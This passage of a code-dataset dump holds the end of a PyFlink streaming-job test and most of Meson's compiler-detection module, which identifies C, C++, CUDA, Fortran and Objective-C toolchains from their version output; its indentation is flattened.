Types.INT()]))
from_collection_source.name("From Collection")
keyed_stream = from_collection_source.key_by(lambda x: x[1], key_type=Types.INT())
plus_two_map_stream = keyed_stream.map(plus_two_map).name("Plus Two Map").set_parallelism(3)
add_from_file_map = plus_two_map_stream.map(add_from_file).name("Add From File Map")
test_stream_sink = add_from_file_map.add_sink(self.test_sink).name("Test Sink")
test_stream_sink.set_parallelism(4)
archive_dir_path = os.path.join(self.tempdir, "archive_" + str(uuid.uuid4()))
os.mkdir(archive_dir_path)
with open(os.path.join(archive_dir_path, "data.txt"), 'w') as f:
f.write("3")
archive_file_path = \
shutil.make_archive(os.path.dirname(archive_dir_path), 'zip', archive_dir_path)
self.env.add_python_archive(archive_file_path, "data")
nodes = eval(self.env.get_execution_plan())['nodes']
        # The StreamGraph should be as below:
# Source: From Collection -> _stream_key_by_map_operator ->
# Plus Two Map -> Add From File Map -> Sink: Test Sink.
# Source: From Collection and _stream_key_by_map_operator should have same parallelism.
self.assertEqual(nodes[0]['parallelism'], nodes[1]['parallelism'])
# The parallelism of Plus Two Map should be 3
self.assertEqual(nodes[2]['parallelism'], 3)
# The ship_strategy for Source: From Collection and _stream_key_by_map_operator should be
# FORWARD
self.assertEqual(nodes[1]['predecessors'][0]['ship_strategy'], "FORWARD")
# The ship_strategy for _keyed_stream_values_operator and Plus Two Map should be
# HASH
self.assertEqual(nodes[2]['predecessors'][0]['ship_strategy'], "HASH")
# The parallelism of Sink: Test Sink should be 4
self.assertEqual(nodes[4]['parallelism'], 4)
env_config_with_dependencies = dict(get_gateway().jvm.org.apache.flink.python.util
.PythonConfigUtil.getEnvConfigWithDependencies(
self.env._j_stream_execution_environment).toMap())
# Make sure that user specified files and archives are correctly added.
self.assertIsNotNone(env_config_with_dependencies['python.files'])
self.assertIsNotNone(env_config_with_dependencies['python.archives'])
def tearDown(self) -> None:
self.test_sink.clear()
| [] | [] | [
"_PYTHON_REQUIREMENTS_INSTALL_DIR",
"python"
] | [] | ["_PYTHON_REQUIREMENTS_INSTALL_DIR", "python"] | python | 2 | 0 | |
mesonbuild/compilers/detect.py | # Copyright 2012-2021 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ..mesonlib import (
MachineChoice, MesonException, EnvironmentException,
search_version, is_windows, Popen_safe, windows_proof_rm,
)
from ..envconfig import BinaryTable
from .. import mlog
from ..linkers import (
guess_win_linker,
guess_nix_linker,
AIXArLinker,
ArLinker,
ArmarLinker,
ArmClangDynamicLinker,
ArmDynamicLinker,
CcrxLinker,
CcrxDynamicLinker,
CompCertLinker,
CompCertDynamicLinker,
C2000Linker,
C2000DynamicLinker,
DLinker,
NAGDynamicLinker,
NvidiaHPC_DynamicLinker,
PGIDynamicLinker,
PGIStaticLinker,
StaticLinker,
Xc16Linker,
Xc16DynamicLinker,
XilinkDynamicLinker,
CudaLinker,
IntelVisualStudioLinker,
VisualStudioLinker,
VisualStudioLikeLinkerMixin,
WASMDynamicLinker,
)
from .compilers import Compiler
from .c import (
CCompiler,
AppleClangCCompiler,
ArmCCompiler,
ArmclangCCompiler,
ClangCCompiler,
ClangClCCompiler,
GnuCCompiler,
ElbrusCCompiler,
EmscriptenCCompiler,
IntelCCompiler,
IntelClCCompiler,
NvidiaHPC_CCompiler,
PGICCompiler,
CcrxCCompiler,
Xc16CCompiler,
CompCertCCompiler,
C2000CCompiler,
VisualStudioCCompiler,
)
from .cpp import (
CPPCompiler,
AppleClangCPPCompiler,
ArmCPPCompiler,
ArmclangCPPCompiler,
ClangCPPCompiler,
ClangClCPPCompiler,
GnuCPPCompiler,
ElbrusCPPCompiler,
EmscriptenCPPCompiler,
IntelCPPCompiler,
IntelClCPPCompiler,
NvidiaHPC_CPPCompiler,
PGICPPCompiler,
CcrxCPPCompiler,
C2000CPPCompiler,
VisualStudioCPPCompiler,
)
from .cs import MonoCompiler, VisualStudioCsCompiler
from .d import (
DCompiler,
DmdDCompiler,
GnuDCompiler,
LLVMDCompiler,
)
from .cuda import CudaCompiler
from .fortran import (
FortranCompiler,
G95FortranCompiler,
GnuFortranCompiler,
ElbrusFortranCompiler,
FlangFortranCompiler,
IntelFortranCompiler,
IntelClFortranCompiler,
NAGFortranCompiler,
Open64FortranCompiler,
PathScaleFortranCompiler,
NvidiaHPC_FortranCompiler,
PGIFortranCompiler,
SunFortranCompiler,
)
from .java import JavaCompiler
from .objc import (
ObjCCompiler,
AppleClangObjCCompiler,
ClangObjCCompiler,
GnuObjCCompiler,
)
from .objcpp import (
ObjCPPCompiler,
AppleClangObjCPPCompiler,
ClangObjCPPCompiler,
GnuObjCPPCompiler,
)
from .cython import CythonCompiler
from .rust import RustCompiler, ClippyRustCompiler
from .swift import SwiftCompiler
from .vala import ValaCompiler
from .mixins.visualstudio import VisualStudioLikeCompiler
from .mixins.gnu import GnuCompiler
from .mixins.clang import ClangCompiler
import subprocess
import platform
import re
import shutil
import tempfile
import os
import typing as T
if T.TYPE_CHECKING:
from ..environment import Environment
from ..programs import ExternalProgram
# Default compilers and linkers
# =============================
defaults: T.Dict[str, T.List[str]] = {}
# List of potential compilers.
if is_windows():
# Intel C and C++ compiler is icl on Windows, but icc and icpc elsewhere.
# Search for icl before cl, since Intel "helpfully" provides a
    # cl.exe that returns *exactly the same thing* that Microsoft's
# cl.exe does, and if icl is present, it's almost certainly what
# you want.
defaults['c'] = ['icl', 'cl', 'cc', 'gcc', 'clang', 'clang-cl', 'pgcc']
# There is currently no pgc++ for Windows, only for Mac and Linux.
defaults['cpp'] = ['icl', 'cl', 'c++', 'g++', 'clang++', 'clang-cl']
defaults['fortran'] = ['ifort', 'gfortran', 'flang', 'pgfortran', 'g95']
# Clang and clang++ are valid, but currently unsupported.
defaults['objc'] = ['cc', 'gcc']
defaults['objcpp'] = ['c++', 'g++']
defaults['cs'] = ['csc', 'mcs']
else:
if platform.machine().lower() == 'e2k':
defaults['c'] = ['cc', 'gcc', 'lcc', 'clang']
defaults['cpp'] = ['c++', 'g++', 'l++', 'clang++']
defaults['objc'] = ['clang']
defaults['objcpp'] = ['clang++']
else:
defaults['c'] = ['cc', 'gcc', 'clang', 'nvc', 'pgcc', 'icc']
defaults['cpp'] = ['c++', 'g++', 'clang++', 'nvc++', 'pgc++', 'icpc']
defaults['objc'] = ['cc', 'gcc', 'clang']
defaults['objcpp'] = ['c++', 'g++', 'clang++']
defaults['fortran'] = ['gfortran', 'flang', 'nvfortran', 'pgfortran', 'ifort', 'g95']
defaults['cs'] = ['mcs', 'csc']
defaults['d'] = ['ldc2', 'ldc', 'gdc', 'dmd']
defaults['java'] = ['javac']
defaults['cuda'] = ['nvcc']
defaults['rust'] = ['rustc']
defaults['swift'] = ['swiftc']
defaults['vala'] = ['valac']
defaults['cython'] = ['cython']
defaults['static_linker'] = ['ar', 'gar']
defaults['strip'] = ['strip']
defaults['vs_static_linker'] = ['lib']
defaults['clang_cl_static_linker'] = ['llvm-lib']
defaults['cuda_static_linker'] = ['nvlink']
defaults['gcc_static_linker'] = ['gcc-ar']
defaults['clang_static_linker'] = ['llvm-ar']
def compiler_from_language(env: 'Environment', lang: str, for_machine: MachineChoice) -> T.Optional[Compiler]:
lang_map: T.Dict[str, T.Callable[['Environment', MachineChoice], Compiler]] = {
'c': detect_c_compiler,
'cpp': detect_cpp_compiler,
'objc': detect_objc_compiler,
'cuda': detect_cuda_compiler,
'objcpp': detect_objcpp_compiler,
'java': detect_java_compiler,
'cs': detect_cs_compiler,
'vala': detect_vala_compiler,
'd': detect_d_compiler,
'rust': detect_rust_compiler,
'fortran': detect_fortran_compiler,
'swift': detect_swift_compiler,
'cython': detect_cython_compiler,
}
return lang_map[lang](env, for_machine) if lang in lang_map else None
def detect_compiler_for(env: 'Environment', lang: str, for_machine: MachineChoice) -> T.Optional[Compiler]:
comp = compiler_from_language(env, lang, for_machine)
if comp is not None:
assert comp.for_machine == for_machine
env.coredata.process_new_compiler(lang, comp, env)
return comp
# Helpers
# =======
def _get_compilers(env: 'Environment', lang: str, for_machine: MachineChoice) -> T.Tuple[T.List[T.List[str]], T.List[str], T.Optional['ExternalProgram']]:
'''
The list of compilers is detected in the exact same way for
    C, C++, ObjC, ObjC++, Fortran and CS, so it is consolidated here.
'''
value = env.lookup_binary_entry(for_machine, lang)
if value is not None:
comp, ccache = BinaryTable.parse_entry(value)
# Return value has to be a list of compiler 'choices'
compilers = [comp]
else:
if not env.machines.matches_build_machine(for_machine):
raise EnvironmentException(f'{lang!r} compiler binary not defined in cross or native file')
compilers = [[x] for x in defaults[lang]]
ccache = BinaryTable.detect_compiler_cache()
if env.machines.matches_build_machine(for_machine):
exe_wrap: T.Optional[ExternalProgram] = None
else:
exe_wrap = env.get_exe_wrapper()
return compilers, ccache, exe_wrap
def _handle_exceptions(
exceptions: T.Mapping[str, T.Union[Exception, str]],
binaries: T.List[T.List[str]],
bintype: str = 'compiler'
) -> T.NoReturn:
errmsg = f'Unknown {bintype}(s): {binaries}'
if exceptions:
errmsg += '\nThe following exception(s) were encountered:'
for c, e in exceptions.items():
errmsg += f'\nRunning "{c}" gave "{e}"'
raise EnvironmentException(errmsg)
# Linker specific
# ===============
def detect_static_linker(env: 'Environment', compiler: Compiler) -> StaticLinker:
linker = env.lookup_binary_entry(compiler.for_machine, 'ar')
if linker is not None:
linkers = [linker]
else:
default_linkers = [[l] for l in defaults['static_linker']]
if isinstance(compiler, CudaCompiler):
linkers = [defaults['cuda_static_linker']] + default_linkers
elif isinstance(compiler, VisualStudioLikeCompiler):
linkers = [defaults['vs_static_linker'], defaults['clang_cl_static_linker']]
elif isinstance(compiler, GnuCompiler):
# Use gcc-ar if available; needed for LTO
linkers = [defaults['gcc_static_linker']] + default_linkers
elif isinstance(compiler, ClangCompiler):
# Use llvm-ar if available; needed for LTO
linkers = [defaults['clang_static_linker']] + default_linkers
elif isinstance(compiler, DCompiler):
# Prefer static linkers over linkers used by D compilers
if is_windows():
linkers = [defaults['vs_static_linker'], defaults['clang_cl_static_linker'], compiler.get_linker_exelist()]
else:
linkers = default_linkers
elif isinstance(compiler, IntelClCCompiler):
        # Intel has its own linker that acts like Microsoft's lib
linkers = [['xilib']]
elif isinstance(compiler, (PGICCompiler, PGIFortranCompiler)) and is_windows():
linkers = [['ar']] # For PGI on Windows, "ar" is just a wrapper calling link/lib.
else:
linkers = default_linkers
popen_exceptions = {}
for linker in linkers:
if not {'lib', 'lib.exe', 'llvm-lib', 'llvm-lib.exe', 'xilib', 'xilib.exe'}.isdisjoint(linker):
arg = '/?'
elif not {'ar2000', 'ar2000.exe'}.isdisjoint(linker):
arg = '?'
else:
arg = '--version'
try:
p, out, err = Popen_safe(linker + [arg])
except OSError as e:
popen_exceptions[' '.join(linker + [arg])] = e
continue
if "xilib: executing 'lib'" in err:
return IntelVisualStudioLinker(linker, getattr(compiler, 'machine', None))
if '/OUT:' in out.upper() or '/OUT:' in err.upper():
return VisualStudioLinker(linker, getattr(compiler, 'machine', None))
if 'ar-Error-Unknown switch: --version' in err:
return PGIStaticLinker(linker)
if p.returncode == 0 and ('armar' in linker or 'armar.exe' in linker):
return ArmarLinker(linker)
if 'DMD32 D Compiler' in out or 'DMD64 D Compiler' in out:
assert isinstance(compiler, DCompiler)
return DLinker(linker, compiler.arch)
if 'LDC - the LLVM D compiler' in out:
assert isinstance(compiler, DCompiler)
return DLinker(linker, compiler.arch, rsp_syntax=compiler.rsp_file_syntax())
if 'GDC' in out and ' based on D ' in out:
assert isinstance(compiler, DCompiler)
return DLinker(linker, compiler.arch)
if err.startswith('Renesas') and ('rlink' in linker or 'rlink.exe' in linker):
return CcrxLinker(linker)
if out.startswith('GNU ar') and ('xc16-ar' in linker or 'xc16-ar.exe' in linker):
return Xc16Linker(linker)
if out.startswith('TMS320C2000') and ('ar2000' in linker or 'ar2000.exe' in linker):
return C2000Linker(linker)
if out.startswith('The CompCert'):
return CompCertLinker(linker)
if p.returncode == 0:
return ArLinker(linker)
if p.returncode == 1 and err.startswith('usage'): # OSX
return ArLinker(linker)
if p.returncode == 1 and err.startswith('Usage'): # AIX
return AIXArLinker(linker)
if p.returncode == 1 and err.startswith('ar: bad option: --'): # Solaris
return ArLinker(linker)
_handle_exceptions(popen_exceptions, linkers, 'linker')
# Compilers
# =========
def _detect_c_or_cpp_compiler(env: 'Environment', lang: str, for_machine: MachineChoice, *, override_compiler: T.Optional[T.List[str]] = None) -> Compiler:
"""Shared implementation for finding the C or C++ compiler to use.
    The override_compiler option is provided to allow compilers which use
    another compiler (usually GCC or Clang) as their shared linker to find
    the linker they need.
"""
popen_exceptions: T.Dict[str, T.Union[Exception, str]] = {}
compilers, ccache, exe_wrap = _get_compilers(env, lang, for_machine)
if override_compiler is not None:
compilers = [override_compiler]
is_cross = env.is_cross_build(for_machine)
info = env.machines[for_machine]
cls: T.Union[T.Type[CCompiler], T.Type[CPPCompiler]]
for compiler in compilers:
if isinstance(compiler, str):
compiler = [compiler]
compiler_name = os.path.basename(compiler[0])
if any(os.path.basename(x) in {'cl', 'cl.exe', 'clang-cl', 'clang-cl.exe'} for x in compiler):
            # Watcom C provides its own cl.exe clone that mimics an older
# version of Microsoft's compiler. Since Watcom's cl.exe is
# just a wrapper, we skip using it if we detect its presence
# so as not to confuse Meson when configuring for MSVC.
#
# Additionally the help text of Watcom's cl.exe is paged, and
# the binary will not exit without human intervention. In
# practice, Meson will block waiting for Watcom's cl.exe to
# exit, which requires user input and thus will never exit.
if 'WATCOM' in os.environ:
def sanitize(p: str) -> str:
return os.path.normcase(os.path.abspath(p))
watcom_cls = [sanitize(os.path.join(os.environ['WATCOM'], 'BINNT', 'cl')),
sanitize(os.path.join(os.environ['WATCOM'], 'BINNT', 'cl.exe')),
sanitize(os.path.join(os.environ['WATCOM'], 'BINNT64', 'cl')),
sanitize(os.path.join(os.environ['WATCOM'], 'BINNT64', 'cl.exe')),]
found_cl = sanitize(shutil.which('cl'))
if found_cl in watcom_cls:
mlog.debug('Skipping unsupported cl.exe clone at:', found_cl)
continue
arg = '/?'
elif 'armcc' in compiler_name:
arg = '--vsn'
elif 'ccrx' in compiler_name:
arg = '-v'
elif 'xc16' in compiler_name:
arg = '--version'
elif 'ccomp' in compiler_name:
arg = '-version'
elif 'cl2000' in compiler_name:
arg = '-version'
elif compiler_name in {'icl', 'icl.exe'}:
# if you pass anything to icl you get stuck in a pager
arg = ''
else:
arg = '--version'
try:
p, out, err = Popen_safe(compiler + [arg])
except OSError as e:
popen_exceptions[' '.join(compiler + [arg])] = e
continue
if 'ccrx' in compiler_name:
out = err
full_version = out.split('\n', 1)[0]
version = search_version(out)
guess_gcc_or_lcc: T.Optional[str] = None
if 'Free Software Foundation' in out or 'xt-' in out:
guess_gcc_or_lcc = 'gcc'
if 'e2k' in out and 'lcc' in out:
guess_gcc_or_lcc = 'lcc'
if 'Microchip Technology' in out:
# this output has "Free Software Foundation" in its version
guess_gcc_or_lcc = None
if guess_gcc_or_lcc:
defines = _get_gnu_compiler_defines(compiler)
if not defines:
popen_exceptions[' '.join(compiler)] = 'no pre-processor defines'
continue
if guess_gcc_or_lcc == 'lcc':
version = _get_lcc_version_from_defines(defines)
cls = ElbrusCCompiler if lang == 'c' else ElbrusCPPCompiler
else:
version = _get_gnu_version_from_defines(defines)
cls = GnuCCompiler if lang == 'c' else GnuCPPCompiler
linker = guess_nix_linker(env, compiler, cls, for_machine)
return cls(
ccache + compiler, version, for_machine, is_cross,
info, exe_wrap, defines=defines, full_version=full_version,
linker=linker)
if 'Emscripten' in out:
cls = EmscriptenCCompiler if lang == 'c' else EmscriptenCPPCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
# emcc requires a file input in order to pass arguments to the
# linker. It'll exit with an error code, but still print the
# linker version. Old emcc versions ignore -Wl,--version completely,
# however. We'll report "unknown version" in that case.
with tempfile.NamedTemporaryFile(suffix='.c') as f:
cmd = compiler + [cls.LINKER_PREFIX + "--version", f.name]
_, o, _ = Popen_safe(cmd)
linker = WASMDynamicLinker(
compiler, for_machine, cls.LINKER_PREFIX,
[], version=search_version(o))
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, linker=linker, full_version=full_version)
if 'armclang' in out:
            # The compiler version is not present in the first line of output;
            # it is on the second line, which starts with 'Component:'.
            # We therefore search for 'Component' anywhere in the output, even
            # though we expect it on the second line, since we are not sure
            # about the output format in future versions.
arm_ver_match = re.search('.*Component.*', out)
if arm_ver_match is None:
popen_exceptions[' '.join(compiler)] = 'version string not found'
continue
arm_ver_str = arm_ver_match.group(0)
# Override previous values
version = search_version(arm_ver_str)
full_version = arm_ver_str
cls = ArmclangCCompiler if lang == 'c' else ArmclangCPPCompiler
linker = ArmClangDynamicLinker(for_machine, version=version)
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'CL.EXE COMPATIBILITY' in out:
# if this is clang-cl masquerading as cl, detect it as cl, not
# clang
arg = '--version'
try:
p, out, err = Popen_safe(compiler + [arg])
except OSError as e:
popen_exceptions[' '.join(compiler + [arg])] = e
version = search_version(out)
match = re.search('^Target: (.*?)-', out, re.MULTILINE)
if match:
target = match.group(1)
else:
target = 'unknown target'
cls = ClangClCCompiler if lang == 'c' else ClangClCPPCompiler
linker = guess_win_linker(env, ['lld-link'], cls, for_machine)
return cls(
compiler, version, for_machine, is_cross, info, target,
exe_wrap, linker=linker)
if 'clang' in out or 'Clang' in out:
linker = None
defines = _get_clang_compiler_defines(compiler)
# Even if the for_machine is darwin, we could be using vanilla
# clang.
if 'Apple' in out:
cls = AppleClangCCompiler if lang == 'c' else AppleClangCPPCompiler
else:
cls = ClangCCompiler if lang == 'c' else ClangCPPCompiler
if 'windows' in out or env.machines[for_machine].is_windows():
# If we're in a MINGW context this actually will use a gnu
# style ld, but for clang on "real" windows we'll use
# either link.exe or lld-link.exe
try:
linker = guess_win_linker(env, compiler, cls, for_machine, invoked_directly=False)
except MesonException:
pass
if linker is None:
linker = guess_nix_linker(env, compiler, cls, for_machine)
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, defines=defines, full_version=full_version, linker=linker)
if 'Intel(R) C++ Intel(R)' in err:
version = search_version(err)
target = 'x86' if 'IA-32' in err else 'x86_64'
cls = IntelClCCompiler if lang == 'c' else IntelClCPPCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = XilinkDynamicLinker(for_machine, [], version=version)
return cls(
compiler, version, for_machine, is_cross, info, target,
exe_wrap, linker=linker)
if 'Microsoft' in out or 'Microsoft' in err:
# Latest versions of Visual Studio print version
# number to stderr but earlier ones print version
# on stdout. Why? Lord only knows.
# Check both outputs to figure out version.
for lookat in [err, out]:
version = search_version(lookat)
if version != 'unknown version':
break
else:
raise EnvironmentException(f'Failed to detect MSVC compiler version: stderr was\n{err!r}')
cl_signature = lookat.split('\n')[0]
match = re.search(r'.*(x86|x64|ARM|ARM64)([^_A-Za-z0-9]|$)', cl_signature)
if match:
target = match.group(1)
else:
m = f'Failed to detect MSVC compiler target architecture: \'cl /?\' output is\n{cl_signature}'
raise EnvironmentException(m)
cls = VisualStudioCCompiler if lang == 'c' else VisualStudioCPPCompiler
linker = guess_win_linker(env, ['link'], cls, for_machine)
# As of this writing, CCache does not support MSVC but sccache does.
if 'sccache' in ccache:
final_compiler = ccache + compiler
else:
final_compiler = compiler
return cls(
final_compiler, version, for_machine, is_cross, info, target,
exe_wrap, full_version=cl_signature, linker=linker)
if 'PGI Compilers' in out:
cls = PGICCompiler if lang == 'c' else PGICPPCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = PGIDynamicLinker(compiler, for_machine, cls.LINKER_PREFIX, [], version=version)
return cls(
ccache + compiler, version, for_machine, is_cross,
info, exe_wrap, linker=linker)
if 'NVIDIA Compilers and Tools' in out:
cls = NvidiaHPC_CCompiler if lang == 'c' else NvidiaHPC_CPPCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = NvidiaHPC_DynamicLinker(compiler, for_machine, cls.LINKER_PREFIX, [], version=version)
return cls(
ccache + compiler, version, for_machine, is_cross,
info, exe_wrap, linker=linker)
if '(ICC)' in out:
cls = IntelCCompiler if lang == 'c' else IntelCPPCompiler
l = guess_nix_linker(env, compiler, cls, for_machine)
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=l)
if 'ARM' in out:
cls = ArmCCompiler if lang == 'c' else ArmCPPCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = ArmDynamicLinker(for_machine, version=version)
return cls(
ccache + compiler, version, for_machine, is_cross,
info, exe_wrap, full_version=full_version, linker=linker)
if 'RX Family' in out:
cls = CcrxCCompiler if lang == 'c' else CcrxCPPCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = CcrxDynamicLinker(for_machine, version=version)
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'Microchip Technology' in out:
            cls = Xc16CCompiler  # XC16 has no C++ variant, so both branches resolved to the same class
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = Xc16DynamicLinker(for_machine, version=version)
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'CompCert' in out:
cls = CompCertCCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = CompCertDynamicLinker(for_machine, version=version)
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'TMS320C2000 C/C++' in out:
cls = C2000CCompiler if lang == 'c' else C2000CPPCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = C2000DynamicLinker(compiler, for_machine, version=version)
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
_handle_exceptions(popen_exceptions, compilers)
raise EnvironmentException(f'Unknown compiler {compilers}')
def detect_c_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
return _detect_c_or_cpp_compiler(env, 'c', for_machine)
def detect_cpp_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
return _detect_c_or_cpp_compiler(env, 'cpp', for_machine)
def detect_cuda_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
popen_exceptions = {}
is_cross = env.is_cross_build(for_machine)
compilers, ccache, exe_wrap = _get_compilers(env, 'cuda', for_machine)
info = env.machines[for_machine]
for compiler in compilers:
arg = '--version'
try:
p, out, err = Popen_safe(compiler + [arg])
except OSError as e:
popen_exceptions[' '.join(compiler + [arg])] = e
continue
# Example nvcc printout:
#
# nvcc: NVIDIA (R) Cuda compiler driver
# Copyright (c) 2005-2018 NVIDIA Corporation
# Built on Sat_Aug_25_21:08:01_CDT_2018
# Cuda compilation tools, release 10.0, V10.0.130
#
# search_version() first finds the "10.0" after "release",
# rather than the more precise "10.0.130" after "V".
# The patch version number is occasionally important; For
# instance, on Linux,
# - CUDA Toolkit 8.0.44 requires NVIDIA Driver 367.48
# - CUDA Toolkit 8.0.61 requires NVIDIA Driver 375.26
# Luckily, the "V" also makes it very simple to extract
# the full version:
version = out.strip().split('V')[-1]
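        # e.g. "Cuda compilation tools, release 10.0, V10.0.130" -> "10.0.130"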
cpp_compiler = detect_cpp_compiler(env, for_machine)
cls = CudaCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = CudaLinker(compiler, for_machine, CudaCompiler.LINKER_PREFIX, [], version=CudaLinker.parse_version())
return cls(ccache + compiler, version, for_machine, is_cross, exe_wrap, host_compiler=cpp_compiler, info=info, linker=linker)
raise EnvironmentException(f'Could not find suitable CUDA compiler: "{"; ".join([" ".join(c) for c in compilers])}"')
def detect_fortran_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
popen_exceptions: T.Dict[str, T.Union[Exception, str]] = {}
compilers, ccache, exe_wrap = _get_compilers(env, 'fortran', for_machine)
is_cross = env.is_cross_build(for_machine)
info = env.machines[for_machine]
cls: T.Type[FortranCompiler]
for compiler in compilers:
for arg in ['--version', '-V']:
try:
p, out, err = Popen_safe(compiler + [arg])
except OSError as e:
popen_exceptions[' '.join(compiler + [arg])] = e
continue
version = search_version(out)
full_version = out.split('\n', 1)[0]
guess_gcc_or_lcc: T.Optional[str] = None
if 'GNU Fortran' in out:
guess_gcc_or_lcc = 'gcc'
if 'e2k' in out and 'lcc' in out:
guess_gcc_or_lcc = 'lcc'
if guess_gcc_or_lcc:
defines = _get_gnu_compiler_defines(compiler)
if not defines:
popen_exceptions[' '.join(compiler)] = 'no pre-processor defines'
continue
if guess_gcc_or_lcc == 'lcc':
version = _get_lcc_version_from_defines(defines)
cls = ElbrusFortranCompiler
linker = guess_nix_linker(env, compiler, cls, for_machine)
return cls(
compiler, version, for_machine, is_cross, info,
exe_wrap, defines, full_version=full_version, linker=linker)
else:
version = _get_gnu_version_from_defines(defines)
cls = GnuFortranCompiler
linker = guess_nix_linker(env, compiler, cls, for_machine)
return cls(
compiler, version, for_machine, is_cross, info,
exe_wrap, defines, full_version=full_version, linker=linker)
if 'G95' in out:
cls = G95FortranCompiler
linker = guess_nix_linker(env, compiler, cls, for_machine)
return G95FortranCompiler(
compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'Sun Fortran' in err:
version = search_version(err)
cls = SunFortranCompiler
linker = guess_nix_linker(env, compiler, cls, for_machine)
return SunFortranCompiler(
compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'Intel(R) Visual Fortran' in err or 'Intel(R) Fortran' in err:
version = search_version(err)
target = 'x86' if 'IA-32' in err else 'x86_64'
cls = IntelClFortranCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = XilinkDynamicLinker(for_machine, [], version=version)
return cls(
compiler, version, for_machine, is_cross, info,
target, exe_wrap, linker=linker)
if 'ifort (IFORT)' in out:
linker = guess_nix_linker(env, compiler, IntelFortranCompiler, for_machine)
return IntelFortranCompiler(
compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'PathScale EKOPath(tm)' in err:
return PathScaleFortranCompiler(
compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version)
if 'PGI Compilers' in out:
cls = PGIFortranCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = PGIDynamicLinker(compiler, for_machine,
cls.LINKER_PREFIX, [], version=version)
return cls(
compiler, version, for_machine, is_cross, info, exe_wrap,
full_version=full_version, linker=linker)
if 'NVIDIA Compilers and Tools' in out:
cls = NvidiaHPC_FortranCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = PGIDynamicLinker(compiler, for_machine,
cls.LINKER_PREFIX, [], version=version)
return cls(
compiler, version, for_machine, is_cross, info, exe_wrap,
full_version=full_version, linker=linker)
if 'flang' in out or 'clang' in out:
linker = guess_nix_linker(env,
compiler, FlangFortranCompiler, for_machine)
return FlangFortranCompiler(
compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'Open64 Compiler Suite' in err:
linker = guess_nix_linker(env,
compiler, Open64FortranCompiler, for_machine)
return Open64FortranCompiler(
compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'NAG Fortran' in err:
full_version = err.split('\n', 1)[0]
version = full_version.split()[-1]
cls = NAGFortranCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = NAGDynamicLinker(
compiler, for_machine, cls.LINKER_PREFIX, [],
version=version)
return cls(
compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
_handle_exceptions(popen_exceptions, compilers)
raise EnvironmentException('Unreachable code (exception to make mypy happy)')
def detect_objc_compiler(env: 'Environment', for_machine: MachineChoice) -> 'Compiler':
return _detect_objc_or_objcpp_compiler(env, for_machine, True)
def detect_objcpp_compiler(env: 'Environment', for_machine: MachineChoice) -> 'Compiler':
return _detect_objc_or_objcpp_compiler(env, for_machine, False)
def _detect_objc_or_objcpp_compiler(env: 'Environment', for_machine: MachineChoice, objc: bool) -> 'Compiler':
popen_exceptions: T.Dict[str, T.Union[Exception, str]] = {}
compilers, ccache, exe_wrap = _get_compilers(env, 'objc' if objc else 'objcpp', for_machine)
is_cross = env.is_cross_build(for_machine)
info = env.machines[for_machine]
comp: T.Union[T.Type[ObjCCompiler], T.Type[ObjCPPCompiler]]
for compiler in compilers:
arg = ['--version']
try:
p, out, err = Popen_safe(compiler + arg)
except OSError as e:
popen_exceptions[' '.join(compiler + arg)] = e
continue
version = search_version(out)
if 'Free Software Foundation' in out:
defines = _get_gnu_compiler_defines(compiler)
if not defines:
popen_exceptions[' '.join(compiler)] = 'no pre-processor defines'
continue
version = _get_gnu_version_from_defines(defines)
comp = GnuObjCCompiler if objc else GnuObjCPPCompiler
linker = guess_nix_linker(env, compiler, comp, for_machine)
return comp(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, defines, linker=linker)
if 'clang' in out:
linker = None
defines = _get_clang_compiler_defines(compiler)
if not defines:
popen_exceptions[' '.join(compiler)] = 'no pre-processor defines'
continue
if 'Apple' in out:
comp = AppleClangObjCCompiler if objc else AppleClangObjCPPCompiler
else:
comp = ClangObjCCompiler if objc else ClangObjCPPCompiler
